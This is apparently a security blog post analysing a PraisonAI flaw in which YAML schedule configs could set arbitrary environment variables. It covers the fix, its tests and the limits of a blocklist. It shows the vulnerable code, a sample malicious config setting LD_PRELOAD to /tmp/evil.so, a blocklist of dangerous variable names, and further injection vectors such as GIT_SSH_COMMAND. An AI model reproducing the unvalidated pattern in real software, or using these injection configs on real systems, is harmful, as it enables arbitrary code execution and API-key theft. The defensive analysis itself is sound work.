PraisonAI let YAML config files set LD_PRELOAD and nobody checked

PraisonAI is an open-source framework for orchestrating multi-agent AI workflows. Its --schedule-config CLI flag accepts a YAML file that, among other things, defines environment variables to set before running a deployment. Until PR #1144 was merged on 25 March 2026, that YAML file could set any environment variable it wanted, including LD_PRELOAD, PATH, PYTHONPATH and every proxy variable on the system, with no validation whatsoever.

The data flow was simple: --schedule-config <file> to yaml.safe_load() to file_config["environment"] to os.environ[key] = str(value). Every key in the YAML's environment section was applied directly to the process environment. No blocklist. No allowlist. No type checking on the keys.

What was exploitable

The vulnerable code sat in src/praisonai/praisonai/cli/main.py around line 496:

env_vars = file_config.get('environment', {})
for key, value in env_vars.items():
    os.environ[key] = str(value)

A crafted YAML config could inject any environment variable. The most dangerous vectors fall into three categories.

Dynamic linker injection. Setting LD_PRELOAD=/tmp/evil.so causes the dynamic linker on Linux to load a specified shared library into every subsequently spawned process. This is CWE-427 (Uncontrolled Search Path Element). The same attack works on macOS via DYLD_INSERT_LIBRARIES. A config file containing this:

environment:
  LD_PRELOAD: /tmp/evil.so
  MODEL_NAME: gpt-4

would load the attacker's shared library into every child process PraisonAI spawns, achieving arbitrary code execution before any application code runs.

Module search path hijacking. Setting PYTHONPATH to a directory containing a malicious module means the next import statement loads attacker-controlled code. Setting PATH redirects which binaries get executed by subprocess calls. Both are CWE-426 (Untrusted Search Path).

Traffic interception. Setting HTTP_PROXY, HTTPS_PROXY or ALL_PROXY redirects all outbound HTTP traffic through an attacker-controlled proxy. For an AI agent framework that routinely sends API keys to LLM providers, this is a direct route to credential theft.

The practical exploitability is medium severity. The user must explicitly run praisonai --deploy --schedule-config malicious.yaml, which is a local CLI action. There is no network attack surface: the --schedule-config flag is not reachable via any API or web endpoint. An attacker who can trick a user into running a malicious config file could equally trick them into running LD_PRELOAD=/evil.so praisonai directly. The value of the fix is defence in depth: config files are shared, committed to repositories and copied between systems in ways that command-line arguments are not.

How the fix works

The fix introduces a _BLOCKED_ENV_KEYS frozenset containing 28 dangerous variable names across four categories:

_BLOCKED_ENV_KEYS = frozenset({
    # Dynamic linker injection
    "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT",
    "DYLD_INSERT_LIBRARIES", "DYLD_LIBRARY_PATH", "DYLD_FRAMEWORK_PATH",
    "DYLD_FALLBACK_LIBRARY_PATH",
    # Executable / module search paths
    "PATH",
    "PYTHONPATH", "PYTHONHOME", "PYTHONSTARTUP",
    "NODE_PATH", "NODE_OPTIONS",
    "RUBYLIB", "PERL5LIB", "PERL5OPT",
    "CLASSPATH",
    # Proxy / redirect
    "HTTP_PROXY", "HTTPS_PROXY", "ALL_PROXY",
    # Misc dangerous
    "BASH_ENV", "ENV", "CDPATH",
    "PROMPT_COMMAND", "SHLVL",
})

A _validate_env_key() function performs case-insensitive matching against this set, rejecting non-string keys (YAML can produce integer or null keys) with a clear error:

def _validate_env_key(key) -> None:
    if not isinstance(key, str):
        raise ValueError(
            f"Environment variable key must be a string, got {type(key).__name__}: {key!r}"
        )
    if key.upper() in _BLOCKED_ENV_KEYS_UPPER:
        raise ValueError(
            f"Setting environment variable '{key}' is not allowed in schedule "
            f"config files because it can be used to execute arbitrary code."
        )

The critical design choice is the fail-closed validation pattern. The patched code validates all keys into a temporary dictionary before applying any of them to os.environ:

env_vars = file_config.get('environment', {})
if not isinstance(env_vars, dict):
    raise ValueError("'environment' must be a mapping of KEY: value pairs")
validated_env = {}
for key, value in env_vars.items():
    _validate_env_key(key)
    validated_env[key] = str(value)
os.environ.update(validated_env)

This matters. CodeRabbit's automated review caught that the original fix attempt applied environment variables one at a time, meaning earlier safe keys would be set before a later blocked key triggered a ValueError. The fail-closed pattern ensures that if any key in the configuration is dangerous, no keys are applied. Partial mutation of the process environment is worse than no mutation at all: it leaves the system in an inconsistent state where some config was applied and some was not.

What the tests cover

The PR includes four tests in test_cwe78_env_injection.py:

test_dangerous_env_keys_are_blocked: Iterates all 28 blocked keys plus lowercase and mixed-case variants, asserting each raises ValueError.
test_safe_env_keys_are_allowed: Confirms benign keys like MODEL_NAME and MY_API_KEY pass validation.
test_non_string_key_rejected: Feeds integers, None, floats and booleans (all valid YAML key types) and asserts clear rejection.
test_vulnerability_scenario_ld_preload: Parses a full YAML config containing LD_PRELOAD: /tmp/evil.so alongside a safe MODEL_NAME key, runs the validate-all-then-apply pattern and confirms LD_PRELOAD was never set in os.environ.

The Qodo automated review flagged a genuine bug in the test fixture: the _clean_env fixture used os.environ.pop() in teardown, which would permanently delete pre-existing environment variables (including PATH) for the rest of the pytest session. This was fixed in a follow-up commit by snapshotting and restoring original values.

The blocklist tradeoff

A blocklist is inherently incomplete. The PR's own disprove analysis acknowledges this honestly. Variables not on the list but still dangerous in specific contexts include:

GCONV_PATH: loads arbitrary shared libraries via glibc's charset conversion mechanism
GIT_SSH_COMMAND: executes arbitrary commands when git operations run
OPENSSL_CONF: loads a crafted OpenSSL configuration that can trigger engine loading
HOME: redirects dotfile loading for every tool the process invokes
IFS: alters shell word splitting, potentially changing how arguments are parsed

The alternative is an allowlist: only permit environment variable names matching a known-good pattern like provider API keys. The PR discussion notes that this approach was considered but rejected because PraisonAI supports a wide range of LLM providers, each with their own environment variable conventions. An allowlist would break whenever a new provider is added. The blocklist trades completeness for compatibility.

This is a reasonable engineering decision for a local CLI tool where the user explicitly provides the config file. It would not be acceptable for a server-side system processing untrusted input. The threat model matters.

The unpatched twin

Maintainer MervinPraison's review comment flagged something the PR did not address: a second identical vulnerable pattern at line 457 in the same file, inside a different code path:

env_vars = file_config.get('environment', {})
for key, value in env_vars.items():
    os.environ[key] = str(value)

Additionally, bots_cli.py at line 136 has os.environ[key] = value from .env file parsing with no blocklist at all. These are the same vulnerability in different clothes. The fix for one code path but not the others is a common pattern in security remediation: the specific instance gets patched while structurally identical instances elsewhere in the codebase remain.

This is not a criticism of the PR. Scope boundaries exist for good reasons and incremental fixes land faster than whole-codebase refactors. But it does mean the vulnerability class is still present in PraisonAI if those other paths are reachable under similar conditions.

A recurring pattern in AI agent frameworks

This is the fourth case study on this blog where an AI agent framework ships an environment-handling vulnerability that would have been caught by standard practice in other contexts. The gptme audit found API keys passed as Docker CLI arguments visible to every user on the system. The Hugging Face skills audit found SQL injection vectors in a database manager that parameterised queries would have prevented. The Hermes Agent review found path traversal through unsanitised worktree include entries.

The common thread is not incompetence. PraisonAI uses yaml.safe_load() rather than yaml.load(), which means someone thought about YAML deserialisation attacks. The environment variable path simply was not part of the threat model. AI agent frameworks tend to start as personal developer tools where the user is the only trust boundary. When those tools grow to support deployment configurations, scheduled execution and multi-user workflows, the trust model changes but the code does not always change with it.

yaml.safe_load() prevents the YAML parser from constructing arbitrary Python objects. It does nothing to prevent the application from taking the parsed data and doing dangerous things with it. The gap between "safe parsing" and "safe handling" is where these vulnerabilities live.